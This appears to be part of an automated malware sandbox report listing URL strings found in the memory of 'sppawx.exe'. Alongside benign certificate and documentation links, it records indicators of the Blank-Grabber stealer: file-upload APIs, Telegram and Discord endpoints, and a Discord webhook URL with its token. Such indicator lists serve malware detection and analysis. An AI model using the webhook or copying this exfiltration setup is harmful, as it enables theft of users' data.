Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.1393896936.0000027234411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3C761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftISPLA~1.PNGy./
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02544000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000B.00000002.1393896936.0000027234411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3C761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: sppawx.exe, 00000002.00000003.1615754397.0000018C01A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.stripe.com/v
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02568000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs
Source: sppawx.exe, 00000002.00000003.1614878751.0000018C7F912000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1615754397.0000018C01A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v
Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: sppawx.exe, 00000002.00000003.1318450801.0000018C7F336000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318293950.0000018C7F3A2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318879940.0000018C7F3C8000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1319218190.0000018C7F3CF000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318366035.0000018C7F334000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318569360.0000018C01C1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: sppawx.exe, 00000002.00000002.1747473298.0000018C7E7B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920p
Source: sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 00000044.00000002.1539735870.000001AF3D638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
